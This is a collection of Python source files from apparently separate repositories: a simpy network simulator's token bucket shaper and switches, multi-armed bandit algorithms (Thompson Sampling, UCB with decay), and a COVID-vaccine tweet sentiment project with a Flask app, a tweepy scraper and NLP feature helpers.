self.current_bucket -= packet.size
self.update_time = self.env.now
# Sending the packet now
if self.peak is None: # infinite peak rate
if self.zero_downstream_buffer:
self.out.put(packet,
upstream_update=self.update,
upstream_store=self.store)
else:
self.out.put(packet)
else:
yield self.env.timeout(packet.size * 8.0 / self.peak)
if self.zero_downstream_buffer:
self.out.put(packet,
upstream_update=self.update,
upstream_store=self.store)
else:
self.out.put(packet)
self.packets_sent += 1
if self.debug:
print(
f"Sent packet {packet.packet_id} from flow {packet.flow_id}."
)
def put(self, packet, upstream_update=None, upstream_store=None):
""" Sends a packet to this element. """
self.packets_received += 1
if self.zero_buffer and upstream_update is not None and upstream_store is not None:
self.upstream_stores[packet] = upstream_store
self.upstream_updates[packet] = upstream_update
if self.zero_downstream_buffer:
self.downstream_stores.put(packet)
return self.store.put(packet)
```
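As a sanity check of the token arithmetic in run(): with rate = 8000 bits/s the bucket refills at 1000 bytes per second, so a 1500-byte packet arriving against an empty bucket is delayed by (1500 - 0) * 8 / 8000 = 1.5 s. A minimal wiring of the shaper, with illustrative rates and sizes, might look like this:
```python
# Minimal sketch: constant-size packets through a TokenBucketShaper (illustrative values).
import simpy
from ns.packet.dist_generator import DistPacketGenerator
from ns.packet.sink import PacketSink
from ns.shaper.token_bucket import TokenBucketShaper

env = simpy.Environment()
# 1500-byte packets every 0.5 s (24 kbit/s offered), shaped down to 8 kbit/s.
pg = DistPacketGenerator(env, "flow_1", lambda: 0.5, lambda: 1500.0, flow_id=0)
shaper = TokenBucketShaper(env, rate=8000.0, bucket_size=1500.0, debug=True)
sink = PacketSink(env)

pg.out = shaper
shaper.out = sink
env.run(until=30)
print(sink.arrivals[0])
```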
#### File: ns/switch/switch.py
```python
from ns.port.port import Port
from ns.demux.fib_demux import FIBDemux
from ns.scheduler.wfq import WFQServer
class SimplePacketSwitch:
""" Implements a simple packet switch with FIFO bounded buffers for outgoing ports.
Parameters
----------
env: simpy.Environment
the simulation environment
nports: int
the total number of ports on this switch.
port_rate: float
the bit rate of the port
buffer_size: int
        the size of an outgoing port's buffer
debug: bool
If True, prints more verbose debug information.
"""
def __init__(self,
env,
nports: int,
port_rate: float,
buffer_size: int,
debug: bool = False) -> None:
self.env = env
self.ports = []
for __ in range(nports):
self.ports.append(
Port(env,
rate=port_rate,
qlimit=buffer_size,
limit_bytes=False,
debug=debug))
self.demux = FIBDemux(fib=None, outs=self.ports, default=None)
def put(self, packet):
""" Sends a packet to this element. """
self.demux.put(packet)
class WFQPacketSwitch:
""" Implements a simple packet switch with WFQ bounded buffers for outgoing ports.
Parameters
----------
env: simpy.Environment
the simulation environment
nports: int
the total number of ports on this switch.
port_rate: float
the bit rate of the port
    buffer: int
        the size of an outgoing port's buffer
debug: bool
If True, prints more verbose debug information.
"""
def __init__(self, env, nports: int, port_rate: float, buffer: int,
weights: list) -> None:
self.env = env
self.ports = []
self.egress_ports = []
self.schedulers = []
for __ in range(nports):
swp = Port(env,
rate=port_rate,
qlimit=buffer,
limit_bytes=False,
zero_downstream_buffer=True)
wfqs = WFQServer(env,
rate=port_rate,
weights=weights,
zero_buffer=True)
swp.out = wfqs
self.egress_ports.append(swp)
self.schedulers.append(wfqs)
self.ports.append(wfqs.out)
self.demux = FIBDemux(fib=None, outs=self.egress_ports, default=None)
def put(self, packet):
""" Sends a packet to this element. """
self.demux.put(packet)
``` |
{
"source": "JINJINT/MABtest",
"score": 3
} |
#### File: MABtest/MABtest/estimation.py
```python
import math
from numpy import sqrt, log, exp, mean, cumsum, zeros, argsort, argmin, argmax, array, power
import numpy
from numpy.random import beta, normal, gamma
def update_posterior(prior_para_1, prior_para_2, reward, reward_type, time_decay = 0.):
if time_decay == 0.:
# compute the posterior based on known prior format
if reward_type =='Bernoulli': # Bernoulli
# using Beta Proir Beta(a,b)
prior_para_1 += reward
prior_para_2 += (1-reward)
if reward_type == 'Gaussian': # Gaussian with known variance 1 and unknown mean
# using Gauss prior N(a,b)
prior_para_1 = (1/(1+prior_para_2))*prior_para_1 + (prior_para_2/(1+prior_para_2))*reward
prior_para_2 = 1/(1/prior_para_2 + 1)
        if reward_type == 'Poisson': # Poisson with unknown mean
# using gamma prior Gamma(a,b)
prior_para_1 += reward
prior_para_2 += 1
else:
# compute the posterior based on known prior format
if reward_type =='Bernoulli':
# using Beta Proir Beta(a,b)
prior_para_1 = (1-time_decay) * prior_para_1 + reward
prior_para_2 = (1-time_decay) * prior_para_2 + (1-reward)
if reward_type == 'Gaussian': # Gaussian with known precision 1 [precision = (1/sigma^2)] and unknown mean
# using Gauss prior N(a,1/b)
prior_para_1 = (time_decay/(time_decay+(1-time_decay)*prior_para_2))*prior_para_1 + (((1-time_decay)*prior_para_2)/(time_decay+(1-time_decay)*prior_para_2))*reward
prior_para_2 = 1/((1-time_decay)/prior_para_2 + time_decay)
if reward_type == 'Poisson':
# using gamma prior Gamma(a,b)
prior_para_1 += reward
prior_para_2 += 1
return prior_para_1, prior_para_2
def sample_posterior(prior_para_1, prior_para_2, reward_type, var_trade_off = 1):
# compute the posterior based on known prior format
# var_trade_off are used to inflate the variance
no_arms = len(prior_para_1)
if reward_type =='Bernoulli':
# using Beta Proir Beta(a,b)
return [beta(prior_para_1[i]/power(var_trade_off,2), prior_para_2[i]/power(var_trade_off,2)) for i in range(no_arms)]
if reward_type == 'Gaussian': # Gaussian with known precision 1 [precision = (1/sigma^2)] and unknown mean
# using Gauss prior N(a,1/b)
return [normal(loc = prior_para_1[i], scale = sqrt(prior_para_2[i])*var_trade_off) for i in range(no_arms)]
if reward_type == 'Poisson':
# using gamma prior Gamma(a,b)
return [gamma(prior_para_1[i]/power(var_trade_off,2), prior_para_2[i]/power(var_trade_off,2)) for i in range(no_arms)]
```
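As a worked example of the conjugate updates above for the Bernoulli case: starting from a Beta(1, 1) prior, observing rewards 1, 0, 1 yields Beta(3, 2), i.e. a posterior mean of 3/5. The import path below is an assumption based on the MABtest/MABtest/estimation.py layout; adjust it if the package is installed differently.
```python
# Worked Beta-Bernoulli update using the helpers defined above.
# The import path is assumed from the MABtest/MABtest/estimation.py layout.
from MABtest.estimation import update_posterior, sample_posterior

a, b = 1.0, 1.0                       # Beta(1, 1) prior
for reward in (1, 0, 1):
    a, b = update_posterior(a, b, reward, reward_type='Bernoulli')
print(a, b)                           # 3.0 2.0 -> posterior mean 0.6

# sample_posterior expects per-arm lists; here a single arm:
print(sample_posterior([a], [b], reward_type='Bernoulli'))   # one Beta(3, 2) draw
```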
#### File: MABtest/MABtest/TS_CD.py
```python
from .uniform_CD import *
class TS_CD(uniform_CD):
def __init__(self, no_arms: int, no_output: int = 1,
conf_level : float =0.05, precision_level: float =0.0,
stop_type: str = 'Best', baseline: Callable[[int],float] = None,
reward_type: str = 'Bernoulli',
trade_off: float = 1, prior_para_1: List[float] =None, prior_para_2: List[float] =None,
time_window: int = 1000, verbose = False) -> None:
        # inherit from the uniform class
super(TS_CD, self).__init__(no_arms, no_output, conf_level, precision_level, stop_type, baseline, reward_type, time_window, verbose)
        # use uncertainty inflation for trading off optimization and inference
        # the value ranges from 1 to infinity; the higher it is, the more the bandit algorithm favors inference, and the more regret it incurs
self.trade_off = trade_off
        # the parameters of the hypothesized distribution of the mean of arms; we consider distributions with two parameters, and different arms are independent
self.prior_para_1: List[float] = prior_para_1 # list of the first parameter of each arm
self.prior_para_2: List[float] = prior_para_2 # list of the second parameter of each arm
def __str__(self):
""" -> str"""
return self.__class__.__name__
def start(self, restart = False):
        # initiation process that is the same as the uniform bandits
super(TS_CD, self).start(restart)
        # initiation process that is particular to the TS bandits
if not restart:
if self.prior_para_1 is None:
if self.reward_type == 'Bernoulli':
self.prior_para_1 = np.repeat(1., self.no_arms)
if self.reward_type == 'Gaussian':
self.prior_para_1 = np.repeat(0., self.no_arms)
if self.prior_para_2 is None:
self.prior_para_2 = np.repeat(1., self.no_arms)
else:
if self.reward_type == 'Bernoulli':
self.prior_para_1 = np.repeat(1., self.no_arms)
if self.reward_type == 'Gaussian':
self.prior_para_1 = np.repeat(0., self.no_arms)
self.prior_para_2 = np.repeat(1., self.no_arms)
def nextpull(self)-> List[int]:
'''
decide which arm(s) to pull next, return a list contains the index of arms
'''
# Thompson Sampling with the uncertainty inflation (when trade-off ==1, it recovers TS)
theta = sample_posterior(self.prior_para_1, self.prior_para_2, self.reward_type, self.trade_off)
argsorted_theta = argsort(theta)[::-1]
arm_idx = argsorted_theta[:self.no_output]
self.next_index = arm_idx
return list(self.next_index)
def update(self, arms: list, rewards: list)-> None:
'''
Update the bandit given the observed rewards for arms that are just pulled
Arguments:
arms : contains the index of pulled arms
rewards : the observed reward for each arm in arms
'''
if type(arms) is not list:
arms = [arms]
if type(rewards) is not list:
rewards = [rewards]
if len(arms)!=len(rewards):
raise ValueError("The length of pulled arms and rewards should be equal!")
for i, idx in enumerate(arms):
            # get the reward for the corresponding arm
reward = rewards[i]
# update the accumulated reward in total for the bandit
self.accreward += reward
            # initiate the object for calculating confidence bounds
cb = ConfidenceBound(name = self.bound_type)
            # get the info dictionary for the corresponding arm
arm = self.arms[idx]
            # delete the corresponding arm with old info from the sorted dictionary list
self.mu_hat_decreasing.remove(arm)
self.ucb_decreasing.remove(arm)
self.lcb_decreasing.remove(arm)
# calculate the updated info for the corresponding arm
arm['Sum'] += reward
arm['SumSquare'] += reward**2
arm['t'] += 1
arm['mu_hat'] = arm['Sum']/arm['t']
arm['mu_std'] = sqrt(abs(arm['SumSquare']/arm['t'] - arm['mu_hat']**2))
arm['lcb'] = cb.lower(arm['mu_hat'], self.conf_level/float(2.*(self.no_arms-self.no_output)), arm['t'], sigma =arm['mu_std'])
arm['ucb'] = cb.upper(arm['mu_hat'], self.conf_level/float(2.*(self.no_output)), arm['t'], sigma =arm['mu_std'])
self.prior_para_1[idx], self.prior_para_2[idx] = update_posterior(self.prior_para_1[idx], self.prior_para_2[idx], rewards[i], self.reward_type)
arm = self.detect_change(arm, reward)
if arm is None:
# if there is a change point up to now, restart the whole bandit
return
            # if there is no change point up to now, continue updating by adding back the corresponding arm with updated info to the sorted dictionary list
self.mu_hat_decreasing.add(arm)
self.ucb_decreasing.add(arm)
self.lcb_decreasing.add(arm)
            # update the total number of pulls for the bandit
self.t += 1
```
#### File: MABtest/MABtest/TS.py
```python
from .uniform import *
class TS(uniform):
def __init__(self, no_arms: int, no_output: int = 1,
conf_level : float =0.05, precision_level: float =0.0,
stop_type: str = 'Best', baseline: Callable[[int],float] = None,
reward_type: str = 'Bernoulli',
trade_off: float = 1, prior_para_1: List[float] =None, prior_para_2: List[float] =None) -> None:
        # inherit from the uniform class
super(TS, self).__init__(no_arms, no_output, conf_level, precision_level, stop_type, baseline, reward_type)
        # use uncertainty inflation for trading off optimization and inference
        # the value ranges from 1 to infinity; the higher it is, the more the bandit algorithm favors inference, and the more regret it incurs
self.trade_off = trade_off
        # the parameters of the hypothesized distribution of the mean of arms; we consider distributions with two parameters, and different arms are independent
self.prior_para_1: List[float] = prior_para_1 # list of the first parameter of each arm
self.prior_para_2: List[float] = prior_para_2 # list of the second parameter of each arm
def __str__(self):
""" -> str"""
return self.__class__.__name__
def start(self):
        # initiation process that is the same as the uniform bandits
super(TS, self).start()
        # initiation process that is particular to the TS bandits
if self.reward_type == 'Bernoulli':
self.prior_para_1 = np.repeat(1., self.no_arms)
if self.reward_type == 'Gaussian':
self.prior_para_1 = np.repeat(0., self.no_arms)
self.prior_para_2 = np.repeat(1., self.no_arms)
def nextpull(self)-> List[int]:
'''
decide which arm(s) to pull next, return a list contains the index of arms
'''
# Thompson Sampling with the uncertainty inflation (when trade-off ==1, it recovers TS)
theta = sample_posterior(self.prior_para_1, self.prior_para_2, self.reward_type, self.trade_off)
argsorted_theta = argsort(theta)[::-1]
arm_idx = argsorted_theta[:self.no_output]
self.next_index = arm_idx
return list(self.next_index)
def update(self, arms: list, rewards: list)-> None:
'''
Update the bandit given the observed rewards for arms that are just pulled
Arguments:
arms : contains the index of pulled arms
rewards : the observed reward for each arm in arms
'''
        # update process that is the same as the uniform bandits
super(TS, self).update(arms,rewards)
# update process that is particular to Thompson Sampling
for i, idx in enumerate(arms):
self.prior_para_1[idx], self.prior_para_2[idx] = update_posterior(self.prior_para_1[idx], self.prior_para_2[idx], rewards[i], self.reward_type)
```
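With the class above, a simulation only needs start(), nextpull() and update(). The sketch below runs the Thompson Sampling bandit against three hypothetical Bernoulli arms; the import path and the arm means are assumptions for illustration, not values from the package.
```python
# Minimal simulation loop for the TS bandit defined above (illustrative arm means).
# The import path is assumed from the MABtest/MABtest/TS.py layout.
import numpy as np
from MABtest.TS import TS

true_means = [0.2, 0.5, 0.7]          # hypothetical Bernoulli arm means
bandit = TS(no_arms=3, no_output=1, reward_type='Bernoulli')
bandit.start()

rng = np.random.default_rng(0)
for _ in range(1000):
    arms = bandit.nextpull()          # list of arm indices to pull next
    rewards = [int(rng.random() < true_means[a]) for a in arms]
    bandit.update(arms, rewards)
```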
#### File: MABtest/MABtest/UCB_decay.py
```python
from .uniform_decay import *
class UCB_decay(uniform_decay):
def __init__(self, no_arms: int, no_output: int = 1,
conf_level : float =0.05, precision_level: float =0.0,
stop_type: str = 'Best', baseline: Callable[[int],float] = None,
reward_type: str = 'Bernoulli', trade_off: float = 1,
time_decay = 0.001) -> None:
        # inherit from the uniform class
super(UCB_decay, self).__init__(no_arms, no_output, conf_level, precision_level, stop_type, baseline, reward_type, time_decay)
        # use uncertainty inflation for trading off optimization and inference
        # the value ranges from 1 to infinity; the higher it is, the more the bandit algorithm favors inference, and the more regret it incurs
self.trade_off = trade_off
def __str__(self):
""" -> str"""
return self.__class__.__name__
def nextpull(self)-> List[int]:
'''
decide which arm(s) to pull next, return a list contains the index of arms
'''
# UCB sampling with the uncertainty inflation (when trade-off ==1, it recovers UCB)
newarm_idx = [self.arms[i]['mu_hat'] + self.trade_off*(self.arms[i]['ucb']-self.arms[i]['mu_hat']) for i in range(self.no_arms)]
self.next_index = argsort(newarm_idx)[::-1][:self.no_output]
return list(self.next_index)
```
#### File: MABtest/MABtest/uniform_decay.py
```python
from .uniform import *
class uniform_decay(uniform):
def __init__(self, no_arms: int, no_output: int = 1,
conf_level : float =0.05, precision_level: float =0.0,
stop_type: str = 'Best', baseline: Callable[[int],float] = None,
reward_type: str = 'Bernoulli',
time_decay = 0.001) -> None:
        # inherit from the uniform class
super(uniform_decay, self).__init__(no_arms, no_output, conf_level, precision_level, stop_type, baseline, reward_type)
# the decay rate
self.time_decay = time_decay
def __str__(self):
""" -> str"""
return self.__class__.__name__
def update(self, arms: list, rewards: list)-> None:
'''
Update the bandit given the observed rewards for arms that are just pulled
Arguments:
arms : contains the index of pulled arms
rewards : the observed reward for each arm in arms
'''
if type(arms) is not list:
arms = [arms]
if type(rewards) is not list:
rewards = [rewards]
if len(arms)!=len(rewards):
raise ValueError("The length of pulled arms and rewards should be equal!")
for i, idx in enumerate(arms):
            # get the reward for the corresponding arm
reward = rewards[i]
# update the accumulated reward in total for the bandit
self.accreward += reward
            # initiate the object for calculating confidence bounds
cb = ConfidenceBound(name = self.bound_type)
            # decay the memory of existing samples for all the arms, since in this memory-decay scenario our memory decays with 'total time' (i.e. the total number of pulls)
for j in range(self.no_arms):
eacharm = self.arms[j]
self.mu_hat_decreasing.remove(eacharm)
self.ucb_decreasing.remove(eacharm)
self.lcb_decreasing.remove(eacharm)
eacharm['Sum'] *= (1-self.time_decay)
eacharm['t'] *= (1-self.time_decay)
if eacharm['t']>0:
eacharm['mu_hat'] = eacharm['Sum']/eacharm['t']
eacharm['lcb'] = cb.lower_timevar(eacharm['mu_hat'], self.conf_level/float(2.*(self.no_arms-self.no_output)), eacharm['t'], self.time_decay, self.t)
eacharm['ucb'] = cb.upper_timevar(eacharm['mu_hat'], self.conf_level/float(2.*(self.no_output)), eacharm['t'], self.time_decay, self.t)
self.mu_hat_decreasing.add(eacharm)
self.ucb_decreasing.add(eacharm)
self.lcb_decreasing.add(eacharm)
            # get the info for the corresponding arm
arm = self.arms[idx]
            # delete the corresponding arm with old info from the sorted dictionary list
self.mu_hat_decreasing.remove(arm)
self.ucb_decreasing.remove(arm)
self.lcb_decreasing.remove(arm)
# update the corresponding arm with the newly arrived sample
arm['Sum'] += reward
arm['SumSquare'] += reward**2
arm['t'] += 1
arm['mu_hat'] = arm['Sum']/arm['t']
arm['mu_std'] = sqrt(abs(arm['SumSquare']/arm['t'] - arm['mu_hat']**2))
arm['lcb'] = cb.lower_timevar(arm['mu_hat'], self.conf_level/float(2.*(self.no_arms-self.no_output)), arm['t'], self.time_decay, self.t)
arm['ucb'] = cb.upper_timevar(arm['mu_hat'], self.conf_level/float(2.*(self.no_output)), arm['t'], self.time_decay, self.t)
            # add back the corresponding arm with updated info to the sorted dictionary list
self.mu_hat_decreasing.add(arm)
self.ucb_decreasing.add(arm)
self.lcb_decreasing.add(arm)
            # update the total number of pulls for the bandit
self.t += 1
``` |
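One consequence of the decay step above: every pull multiplies each arm's 'Sum' and 't' by (1 - time_decay) before the new sample is added, so the effective sample size of an arm that is pulled on every round converges to roughly 1/time_decay (about 1000 observations for the default 0.001). The standalone arithmetic below just mimics that bookkeeping to show the geometric limit; it does not touch the class itself.
```python
# Illustration of the discounted pull counter used by uniform_decay.
time_decay = 0.001
t = 0.0
for _ in range(20000):           # the same arm is pulled on every round
    t = (1 - time_decay) * t     # decay applied to the existing count
    t += 1                       # the new pull
print(round(t, 1))               # approaches 1 / time_decay = 1000
```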
{
"source": "jinjin-tonic/COVID-vaccine-sentiment-analysis",
"score": 2
} |
#### File: jinjin-tonic/COVID-vaccine-sentiment-analysis/app.py
```python
from flask import Flask, render_template, url_for, request, redirect
from deployment_model.seq_model import SeqModel
from utils.preprocessing_helper import *
from torchtext.data import Field, Pipeline
from nltk.tokenize import word_tokenize
from wordcloud import STOPWORDS
import torch
import pickle
import os
import nltk
# from flask_bootstrap import Bootstrap
nltk.download("stopwords")
nltk.download("punkt")
# sys.path.append(os.path.join(os.path.dirname(__file__), '..'))
TEMPLATE_DIR = os.path.abspath("./templates")
STATIC_DIR = os.path.abspath("./static")
app = Flask(__name__, template_folder=TEMPLATE_DIR, static_folder=STATIC_DIR)
# original stuff:
# app = Flask(__name__)
# , static_url_path= '', static_folder= './static/vendor'
# app._static_folder = './static/vendor'
# bootstrap = Bootstrap(app)
RESULT = None
pre_pipeline = Pipeline(lemmatize)
pre_pipeline.add_before(preprocessing)
TEXT = Field(
sequential=True,
tokenize=word_tokenize,
lower=True,
stop_words=STOPWORDS,
preprocessing=pre_pipeline,
)
LABELS = ["Neutral", "Negative", "Positive"]
VOCAB = {}
with open("./models/vocab.pkl", "rb") as f:
VOCAB = pickle.load(f)
best_config = {
"hidden_size": 302,
"lr": 0.00010769630091763721,
"l2": 2.5888680371842294e-05,
"nonlin": "tanh",
"dropout": 0.1,
"num_layers": 2,
"mode": 0,
"optimizer": "Adam",
"momentum": 0.1,
}
best_model = SeqModel(
embedding_size=100,
vocab_size=len(VOCAB),
output_size=3,
hidden_size=best_config["hidden_size"],
num_layers=best_config["num_layers"],
nonlin=best_config["nonlin"],
dropout_rate=best_config["dropout"],
mode=best_config["mode"],
unit="gru",
more_features=False,
)
best_model.load_state_dict(torch.load("./models/model_deploy.pt"))
@app.route("/", methods=["POST", "GET"])
def index():
return render_template("index.html")
@app.route("/resultspage", methods=["POST", "GET"])
def resultspage():
tweet = request.form["search"]
RESULT = predict_sentiment(best_model, {"tweet": tweet})[0]
return render_template("resultspage.html", value=RESULT)
def preprocess(tweet):
return [VOCAB.get(token, 0) for token in TEXT.preprocess(tweet)]
def predict_sentiment(model, input_json):
tweet = input_json["tweet"]
num_input = preprocess(tweet)
    model_outputs = model(torch.LongTensor(num_input).reshape((-1, 1)))
probabilities, predicted = torch.max(model_outputs.cpu().data, 1)
pred_labels = LABELS[predicted]
return pred_labels, probabilities
if __name__ == "__main__":
# Bind to PORT if defined, otherwise default to 5000.
port = int(os.environ.get("PORT", 5000))
app.run(host="0.0.0.0", port=port, debug=True)
```
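Once the server is running, the /resultspage route reads a form field named search (request.form["search"] above). A minimal client-side check could look like the sketch below; the host and port assume the local defaults from the __main__ block, and the tweet text is made up.
```python
# Minimal client sketch for the /resultspage endpoint (assumes the local dev server).
import requests

resp = requests.post(
    "http://127.0.0.1:5000/resultspage",
    data={"search": "Finally got my second dose of the covid vaccine!"},
)
print(resp.status_code)    # 200 when the model and templates load correctly
print(resp.text[:200])     # start of the rendered resultspage.html
```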
#### File: COVID-vaccine-sentiment-analysis/scripts/tweet_scraper.py
```python
import tweepy
import webbrowser
import time
import csv
import argparse
import os
def compose_dict_obj(raw_data, keys, search_words):
"""
Return a dictionary of selected keys from raw_data
"""
d = {}
for key in keys:
if key == "keyword":
d[key] = search_words
else:
d[key] = raw_data.get(key)
return d
# the handler is time.sleep(15 * 60) if we reach the rate limit.
def limit_handled(cursor):
while True:
try:
yield cursor.next()
except tweepy.TweepError:
time.sleep(15 * 60)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Process each .")
parser.add_argument("-k", "--keyword", help="The keyword to search", required=True)
parser.add_argument("--num", help="Max number of data to scrape", default=10000)
parser.add_argument(
"-o", "--output", help="The filepath of the output file", default="./raw.csv"
)
args = parser.parse_args()
consumer_key = os.environ["CONSUMER_KEY"]
consumer_secret = os.environ["CONSUMER_SECRET"]
# search_words = "Covid19 vaccine -filter:retweets"
search_words = args.keyword
max_num = int(args.num)
csv_file = args.output
keys = [
"created_at",
"id",
"full_text",
"entities",
"source",
"user",
"coordinates",
"place",
"is_quote_status",
"retweet_count",
"favorite_count",
"possibly_sensitive",
"keyword",
]
callback_uri = "oob" # https://cfe.sh/twitter/callback
auth = tweepy.OAuthHandler(consumer_key, consumer_secret, callback_uri)
redirect_url = auth.get_authorization_url()
print(redirect_url)
webbrowser.open(redirect_url)
user_pint_input = input("What's the pin?")
auth.get_access_token(user_pint_input)
print(auth.access_token, auth.access_token_secret)
api = tweepy.API(auth, wait_on_rate_limit=True, wait_on_rate_limit_notify=True)
tweetCursor = tweepy.Cursor(
api.search, q=search_words, lang="en", tweet_mode="extended"
).items(max_num)
try:
with open(csv_file, "w") as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=keys)
writer.writeheader()
            for i, tweet in enumerate(tweetCursor):
                if i >= max_num:
                    break
                if i % 1000 == 0:
                    print(i)
big_json = tweet._json
if "retweeted_status" in big_json:
data = big_json["retweeted_status"]
else:
data = big_json
struct_data = compose_dict_obj(data, keys, search_words)
writer.writerow(struct_data)
except IOError:
print("I/O error")
```
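To make the record shape written to the CSV concrete, here is a self-contained sketch of `compose_dict_obj` (reproduced from the script above) applied to a made-up tweet payload; the sample values are illustrative only.
```python
def compose_dict_obj(raw_data, keys, search_words):
    # same helper as in the script above: pick selected keys, inject the search keyword
    d = {}
    for key in keys:
        if key == "keyword":
            d[key] = search_words
        else:
            d[key] = raw_data.get(key)
    return d

raw_data = {"created_at": "Mon Feb 01 10:00:00 +0000 2021",
            "full_text": "Got my first dose today!",
            "retweet_count": 3}
keys = ["created_at", "full_text", "retweet_count", "place", "keyword"]
row = compose_dict_obj(raw_data, keys, "Covid19 vaccine -filter:retweets")
print(row["keyword"])  # the search keyword, not a tweet field
print(row["place"])    # None, because the sample payload has no 'place' key
```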
#### File: COVID-vaccine-sentiment-analysis/utils/feature_extractions_helper.py
```python
import nltk
import re
import pandas as pd
from nltk import sent_tokenize, word_tokenize, pos_tag
from nltk.corpus import stopwords
from nltk.stem import WordNetLemmatizer
from nltk import sent_tokenize, word_tokenize, pos_tag
from emoji.unicode_codes import UNICODE_EMOJI
from nltk.tokenize import RegexpTokenizer
import string
FIRST_PERSON_PRONOUNS = {"i", "me", "my", "mine", "we", "us", "our", "ours"}
SECOND_PERSON_PRONOUNS = {"you", "your", "yours", "u", "ur", "urs"}
THIRD_PERSON_PRONOUNS = {
"he",
"him",
"his",
"she",
"her",
"hers",
"it",
"its",
"they",
"them",
"their",
"theirs",
}
PUNCTUATION_LIST = list(string.punctuation)
###### Attribution for positive words dictionary: https://gist.github.com/mkulakowski2/4289437
positive_words = []
with open("data/helper_dicts/positive-words.txt") as f:
for i in range(35):
f.readline()
for i in range(35, 2042):
positive_words.append(f.readline().strip("\n"))
###### Attribution for negative words dictionary: https://gist.github.com/mkulakowski2/4289441
negative_words = []
with open("data/helper_dicts/negative-words.txt") as f:
for i in range(35):
f.readline()
for i in range(35, 2042):
negative_words.append(f.readline().strip("\n"))
###### This sentiment dictionary for slang words is from SlangSD, made by <NAME> (Student, ASU), <NAME> (Student, ASU), and <NAME> (Professor, ASU).
###### Link for SlangSD: http://liangwu.me/slangsd/
slang_df = pd.read_csv(
"data/helper_dicts/SlangSD.txt", delimiter="\t", names=["sentiment"]
)
########################################################
# The verb dictionary used in this code is adapted from https://github.com/monolithpl/verb.forms.dictionary
########################################################
verb_dict = pd.read_csv(
"data/helper_dicts/verbs-dictionaries.csv",
delimiter="\t",
header=None,
names=["present_simple", "past_simple", "past_participle", "present_participle"],
)
past_simples = verb_dict["past_simple"].to_dict().values()
tokenizer = RegexpTokenizer(r"\w+")
def get_avg_pos_words(text):
"""Calculate the positive words ratio per text."""
tokens = word_tokenize(text)
pos_count = 0
for word in tokens:
if word in positive_words:
pos_count += 1
return pos_count / len(tokens)
def get_avg_neg_words(text):
"""Calculate the negative words ratio per text."""
tokens = word_tokenize(text)
neg_count = 0
for word in tokens:
if word in negative_words:
neg_count += 1
return neg_count / len(tokens)
def count_past_tense(text):
"""Count the number of past tense in the text."""
counter = 0
tokens = word_tokenize(text.lower())
tagged_words = pos_tag(tokens)
for word, pos in tagged_words:
if pos[0] == "V":
if word in past_simples:
counter += 1
return counter
def count_future_tense(text):
"""Count the number of future tense in the text."""
future_form = {"'ll", "will", "wo"}
counter = 0
tokens = word_tokenize(text.lower())
tagged_words = pos_tag(tokens)
for word, pos in tagged_words:
if pos == "MD":
if word in future_form:
counter += 1
return counter
def count_first_person_pro(text):
"""Count the number of first-person pronouns in the text."""
return len(
re.findall(r"\b({})\b".format("|".join(FIRST_PERSON_PRONOUNS)), text.lower())
)
def count_second_person_pro(text):
"""Count the number of second-person pronouns in the text."""
return len(
re.findall(r"\b({})\b".format("|".join(SECOND_PERSON_PRONOUNS)), text.lower())
)
def count_third_person_pro(text):
"""Count the number of third-person pronouns in the text."""
return len(
re.findall(r"\b({})\b".format("|".join(THIRD_PERSON_PRONOUNS)), text.lower())
)
def count_coord_conj(text):
"""Count the number of coordinating conjunctions in the text."""
token_tag_pairs = pos_tag(word_tokenize(text.lower()))
return len([p[1] for p in token_tag_pairs if p[1] == "CC"])
def count_commas(text):
"""Count the number of commas in the text."""
counter = 0
tokens = word_tokenize(text.lower())
for word in tokens:
if word == ",":
counter += 1
return counter
def count_multi_punc(text, include_dots=True):
"""Count the number of multi punctuation characters in the text."""
counter = 0
if include_dots:
pattern = r"(\!{2,}|\?{2,}|\.{3,})"
else:
pattern = r"(\!{2,}|\?{2,})"
compiled = re.compile(pattern)
for match in compiled.finditer(text.lower()):
if match:
counter += 1
return counter
def get_avg_slang_sent(text):
"""Calculate the slang ratio per text."""
slang_sent = 0
split = text.split(" ")
tokens = [token.strip("".join(PUNCTUATION_LIST)) for token in split]
for word in tokens:
if word in slang_df.index and word not in stopwords.words("english"):
slang_sent += slang_df.loc[word]["sentiment"]
return slang_sent / len(tokens) ## avg vs just raw sum
def count_tags(text):
"""Count the number of common nouns, proper nouns, adverb, and wh- words"""
words = word_tokenize(text)
tagged_words = nltk.pos_tag(words)
common_noun_count = 0
proper_noun_count = 0
adv_count = 0
wh_count = 0
for word, pos in tagged_words:
if pos == "NN" or pos == "NNS":
common_noun_count += 1
elif pos == "NNPS" or pos == "NNP":
proper_noun_count += 1
elif pos == "RB" or pos == "RBR" or pos == "RBS":
adv_count += 1
elif pos == "WP" or pos == "WDT" or pos == "WRB":
wh_count += 1
return common_noun_count, proper_noun_count, adv_count, wh_count
def count_cap_words(text):
"""Count the amount of capitalized words in a text"""
cap_words = 0
words = word_tokenize(text)
for word in words:
if word.isupper():
cap_words = cap_words + 1
else:
cap_words = cap_words
return cap_words
def avg_len_sent(text):
"""Calculates the average length of sentences, in tokens"""
token_count = len(text.split())
sent_count = text.count(". ") + 1
if sent_count != 0:
return token_count / sent_count
else:
return 0
def avg_len_tokens(text):
"""Calculates the average length of tokens, excluding punctuation, in characters"""
token_with_no_punc = tokenizer.tokenize(text.lower())
if len(token_with_no_punc) != 0:
return len("".join(token_with_no_punc)) / len(token_with_no_punc)
else:
return 0
def num_of_sent(text):
"""Counts the number of sentences"""
return text.count(". ") + 1
def num_slang_acronym(text):
    """Count the amount of slang acronyms in a text"""
    # NOTE: SLANG is not defined in this module; a collection of slang acronym strings
    # must be defined or imported elsewhere before this function can run.
    return len(re.findall(r"\b({})\b".format("|".join(SLANG)), text.lower()))
```
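A short sketch of how a few of the helpers above could be combined into a feature row for a single tweet. It assumes the module is importable as `utils.feature_extractions_helper`, that the NLTK data (punkt, averaged_perceptron_tagger, stopwords, wordnet) has been downloaded, and that the files under `data/helper_dicts/` exist, since they are read at import time.
```python
from utils import feature_extractions_helper as feh

tweet = "We finally got our shots!! When will you get yours?"
features = {
    "pos_word_ratio": feh.get_avg_pos_words(tweet),
    "neg_word_ratio": feh.get_avg_neg_words(tweet),
    "first_person": feh.count_first_person_pro(tweet),
    "second_person": feh.count_second_person_pro(tweet),
    "multi_punct": feh.count_multi_punc(tweet),
    "capitalized_words": feh.count_cap_words(tweet),
}
print(features)
```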
#### File: COVID-vaccine-sentiment-analysis/utils/preprocessing_helper.py
```python
import string
# import demoji
import nltk
import re
from nltk import sent_tokenize, word_tokenize, pos_tag
from nltk.stem import WordNetLemmatizer
